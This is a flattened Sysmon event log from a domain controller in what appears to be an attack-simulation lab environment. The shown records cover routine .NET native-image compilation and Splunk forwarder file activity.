21:04:16.556{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D0-60D3-A003-00000000CF01}7072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020629Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:16.447{4DB9351A-A1CF-60D3-9F03-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1980-0\Microsoft.PowerShell.GPowerShell.dll2021-06-23 21:04:16.447 23542300x800000000000000020628Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:16.447{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B54E140FED223610D1789ACF6527025F,SHA256=AF3FC75BBEE73DF02B0B5DF9C24EB538FCB0DE66056645715A76A12DFA453975,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020651Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.837{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D1-60D3-A503-00000000CF01}2096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020650Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.822{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D1-60D3-A503-00000000CF01}2096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020649Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:17.822{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D1-60D3-A503-00000000CF01}2096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020648Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:17.759{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D1-60D3-A403-00000000CF01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020647Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.743{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1D1-60D3-A403-00000000CF01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020646Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:17.743{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D1-60D3-A403-00000000CF01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020645Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:17.712{4DB9351A-A1D1-60D3-A303-00000000CF01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19dc-0\Microsoft.PowerShell.ISECommon.dll2021-06-23 21:04:17.712 10341000x800000000000000020644Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:17.665{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D1-60D3-A303-00000000CF01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020643Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.650{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D1-60D3-A303-00000000CF01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020642Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:17.650{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D1-60D3-A303-00000000CF01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020641Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:17.603{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D1-60D3-A203-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020640Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.587{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1D1-60D3-A203-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020639Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:17.587{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D1-60D3-A203-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020638Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.587{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1B395FDABCFF5A72185FA7569A18058D,SHA256=2CAFAEFA5408946E10E08922090DD498E59560BCD4C296B21194554190753149,IMPHASH=00000000000000000000000000000000falsetrue 
11241100x800000000000000020637Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:17.540{4DB9351A-A1D0-60D3-A103-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1ac4-0\Microsoft.PowerShell.GraphicalHost.dll2021-06-23 21:04:17.540 23542300x800000000000000020636Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.462{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA43E899C6A73BB85DEC1469A3A9486A,SHA256=4C4FD4BC1A017FFD8EF09D088C872F25F7CBE48D6DCE3EAB5981A4D884D24612,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020659Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:18.978{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D2-60D3-A703-00000000CF01}6584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020658Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:18.978{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D2-60D3-A703-00000000CF01}6584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020657Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:18.837{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D2-60D3-A603-00000000CF01}6912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020656Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:18.822{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D2-60D3-A603-00000000CF01}6912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020655Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:18.822{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D2-60D3-A603-00000000CF01}6912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020654Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:18.759{4DB9351A-A1D1-60D3-A503-00000000CF01}2096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\830-0\Microsoft.PowerShell.Management.Activities.dll2021-06-23 21:04:18.759 23542300x800000000000000020653Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:18.603{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=784B7E4E5CF56388CDB1FFA14575BBC8,SHA256=3107B116FB8CA831F55D7A0422668231C9BFCF4B0AAE16B62F59C1C456F5848D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020652Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:18.478{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17D3F62B6617F8A82733013EC2D8EA70,SHA256=21F2C8B7C44AA00CCB29690E22BD17ED0282AE3266C7525A64DA70EA2AA1957B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020677Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.837{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D8CBC766A98E792C1ADB900074502BA,SHA256=614C014FB9648E90ABEF06C9C0B9DAA4E3E5CA5BA8CB4BF76D029FE37D43BE31,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020676Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:19.775{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D3-60D3-AB03-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+